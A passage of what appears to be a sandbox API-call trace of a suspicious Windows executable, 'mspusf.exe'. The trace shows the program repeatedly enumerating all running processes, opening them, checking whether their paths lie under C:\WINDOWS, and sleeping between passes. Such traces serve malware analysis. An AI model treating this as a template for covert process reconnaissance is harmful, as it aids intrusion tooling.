(dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x12e4) returned 0x0 [0070.636] Process32NextW (in: hSnapshot=0x430, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x130c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0070.636] GetCurrentProcessId () returned 0xf00 [0070.636] GetCurrentProcess () returned 0xffffffff [0070.636] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0070.636] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x130c) returned 0x0 [0070.636] Process32NextW (in: hSnapshot=0x430, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="AppHostRegistrationVerifier.exe")) returned 1 [0070.637] GetCurrentProcessId () returned 0xf00 [0070.637] GetCurrentProcess () returned 0xffffffff [0070.637] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0070.637] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x1314) returned 0x434 [0070.637] GetModuleFileNameExW (in: hProcess=0x434, hModule=0x0, lpFilename=0x2eef9f4, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\AppHostRegistrationVerifier.exe" (normalized: "c:\\windows\\system32\\apphostregistrationverifier.exe")) returned 0x33 [0070.637] StrStrIW (lpFirst="C:\\Windows\\System32\\AppHostRegistrationVerifier.exe", lpSrch="C:\\WINDOWS") returned="C:\\Windows\\System32\\AppHostRegistrationVerifier.exe" [0070.637] CloseHandle (hObject=0x434) returned 1 [0070.637] Process32NextW (in: hSnapshot=0x430, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x131c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0070.638] GetCurrentProcessId () returned 0xf00 [0070.638] GetCurrentProcess () returned 0xffffffff [0070.638] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0070.638] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x131c) returned 0x0 [0070.638] Process32NextW (in: hSnapshot=0x430, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x135c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x130c, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0070.638] GetCurrentProcessId () returned 0xf00 [0070.638] GetCurrentProcess () returned 0xffffffff [0070.638] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0070.638] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x135c) returned 0x0 [0070.638] Process32NextW (in: hSnapshot=0x430, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x12e4, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0070.639] GetCurrentProcessId () returned 0xf00 [0070.639] GetCurrentProcess () returned 0xffffffff [0070.639] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0070.639] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x1364) returned 0x0 [0070.639] Process32NextW (in: hSnapshot=0x430, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="mspusf.exe")) returned 1 [0070.639] GetCurrentProcessId () returned 0xf00 [0070.639] Process32NextW (in: hSnapshot=0x430, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x704, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf00, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0070.640] GetCurrentProcessId () returned 0xf00 [0070.640] GetCurrentProcess () returned 0xffffffff [0070.640] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0070.640] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x704) returned 0x434 [0070.640] GetModuleFileNameExW (in: hProcess=0x434, hModule=0x0, lpFilename=0x2eef9f4, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe")) returned 0x1f [0070.640] StrStrIW (lpFirst="C:\\Windows\\System32\\conhost.exe", lpSrch="C:\\WINDOWS") returned="C:\\Windows\\System32\\conhost.exe" [0070.640] CloseHandle (hObject=0x434) returned 1 [0070.640] Process32NextW (in: hSnapshot=0x430, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x13f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0070.641] GetCurrentProcessId () returned 0xf00 [0070.641] GetCurrentProcess () returned 0xffffffff [0070.641] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0070.641] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x13f8) returned 0x0 [0070.641] Process32NextW (in: hSnapshot=0x430, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xafc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0070.641] GetCurrentProcessId () returned 0xf00 [0070.641] GetCurrentProcess () returned 0xffffffff [0070.641] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0070.642] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0xafc) returned 0x0 [0070.642] Process32NextW (in: hSnapshot=0x430, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xafc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 0 [0070.642] CloseHandle (hObject=0x430) returned 1 [0070.642] Sleep (dwMilliseconds=0x3a98) [0080.732] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x430 [0080.738] Process32FirstW (in: hSnapshot=0x430, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0080.738] GetCurrentProcessId () returned 0xf00 [0080.738] GetCurrentProcess () returned 0xffffffff [0080.738] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0080.738] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0080.738] Process32NextW (in: hSnapshot=0x430, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6a, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0080.739] GetCurrentProcessId () returned 0xf00 [0080.739] GetCurrentProcess () returned 0xffffffff [0080.739] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0080.739] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0080.739] Process32NextW (in: hSnapshot=0x430, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0080.739] GetCurrentProcessId () returned 0xf00 [0080.739] GetCurrentProcess () returned 0xffffffff [0080.739] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0080.739] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x140) returned 0x0 [0080.739] Process32NextW (in: hSnapshot=0x430, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0080.740] GetCurrentProcessId () returned 0xf00 [0080.740] GetCurrentProcess () returned 0xffffffff [0080.740] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0080.740] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x198) returned 0x0 [0080.740] Process32NextW (in: hSnapshot=0x430, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0080.740] GetCurrentProcessId () returned 0xf00 [0080.740] GetCurrentProcess () returned 0xffffffff [0080.740] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0080.740] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0080.740] Process32NextW (in: hSnapshot=0x430, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0080.741] GetCurrentProcessId () returned 0xf00 [0080.741] GetCurrentProcess () returned 0xffffffff [0080.741] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0080.741] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x1e4) returned 0x0 [0080.741] Process32NextW (in: hSnapshot=0x430, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0080.741] GetCurrentProcessId () returned 0xf00 [0080.741] GetCurrentProcess () returned 0xffffffff [0080.741] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0080.741] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x220) returned 0x0 [0080.741] Process32NextW (in: hSnapshot=0x430, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x23c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0080.742] GetCurrentProcessId () returned 0xf00 [0080.742] GetCurrentProcess () returned 0xffffffff [0080.742] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0080.742] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x23c) returned 0x0 [0080.742] Process32NextW (in: hSnapshot=0x430, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0080.742] GetCurrentProcessId () returned 0xf00 [0080.742] GetCurrentProcess () returned 0xffffffff [0080.742] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0080.743] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x244) returned 0x0 [0080.743] Process32NextW (in: hSnapshot=0x430, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0080.743] GetCurrentProcessId () returned 0xf00 [0080.743] GetCurrentProcess () returned 0xffffffff [0080.743] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0080.743] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x2a4) returned 0x0 [0080.743] Process32NextW (in: hSnapshot=0x430, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x220, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0080.744] GetCurrentProcessId () returned 0xf00 [0080.744] GetCurrentProcess () returned 0xffffffff [0080.744] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0080.744] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x2ac) returned 0x0 [0080.744] Process32NextW (in: hSnapshot=0x430, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0080.744] GetCurrentProcessId () returned 0xf00 [0080.744] GetCurrentProcess () returned 0xffffffff [0080.744] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0080.744] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x2b4) returned 0x0 [0080.744] Process32NextW (in: hSnapshot=0x430, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x304, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0080.745] GetCurrentProcessId () returned 0xf00 [0080.745] GetCurrentProcess () returned 0xffffffff [0080.745] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0080.745] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x304) returned 0x0 [0080.745] Process32NextW (in: hSnapshot=0x430, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x220, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0080.745] GetCurrentProcessId () returned 0xf00 [0080.745] GetCurrentProcess () returned 0xffffffff [0080.745] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0080.745] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x370) returned 0x0 [0080.745] Process32NextW (in: hSnapshot=0x430, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5b, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0080.746] GetCurrentProcessId () returned 0xf00 [0080.746] GetCurrentProcess () returned 0xffffffff [0080.746] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0080.746] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x3ac) returned 0x0 [0080.746] Process32NextW (in: hSnapshot=0x430, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0080.746] GetCurrentProcessId () returned 0xf00 [0080.746] GetCurrentProcess () returned 0xffffffff [0080.747] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0080.747] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0 [0080.747] Process32NextW (in: hSnapshot=0x430, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0080.747] GetCurrentProcessId () returned 0xf00 [0080.747] GetCurrentProcess () returned 0xffffffff [0080.747] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0080.747] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x3d8) returned 0x0 [0080.747] Process32NextW (in: hSnapshot=0x430, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0080.751] GetCurrentProcessId () returned 0xf00 [0080.751] GetCurrentProcess () returned 0xffffffff [0080.751] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0080.751] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0080.751] Process32NextW (in: hSnapshot=0x430, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x350, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0080.752] GetCurrentProcessId () returned 0xf00 [0080.752] GetCurrentProcess () returned 0xffffffff [0080.752] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0080.752] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x350) returned 0x0 [0080.752] Process32NextW (in: hSnapshot=0x430, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x434, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0080.752] GetCurrentProcessId () returned 0xf00 [0080.752] GetCurrentProcess () returned 0xffffffff [0080.752] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0080.752] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x434) returned 0x0 [0080.752] Process32NextW (in: hSnapshot=0x430, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x554, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0080.753] GetCurrentProcessId () returned 0xf00 [0080.753] GetCurrentProcess () returned 0xffffffff [0080.753] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0080.753] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x554) returned 0x0 [0080.753] Process32NextW (in: hSnapshot=0x430, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0080.753] GetCurrentProcessId () returned 0xf00 [0080.753] GetCurrentProcess () returned 0xffffffff [0080.753] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0080.754] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x590) returned 0x0 [0080.754] Process32NextW (in: hSnapshot=0x430, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0080.754] GetCurrentProcessId () returned 0xf00 [0080.754] GetCurrentProcess () returned 0xffffffff [0080.754] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0080.754] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x598) returned 0x0 [0080.754] Process32NextW (in: hSnapshot=0x430, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0080.755] GetCurrentProcessId () returned 0xf00 [0080.755] GetCurrentProcess () returned 0xffffffff [0080.755] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0080.755] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x5b0) returned 0x0 [0080.755] Process32NextW (in: hSnapshot=0x430, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0080.755] GetCurrentProcessId () returned 0xf00 [0080.755] GetCurrentProcess () returned 0xffffffff [0080.755] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0080.755] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, 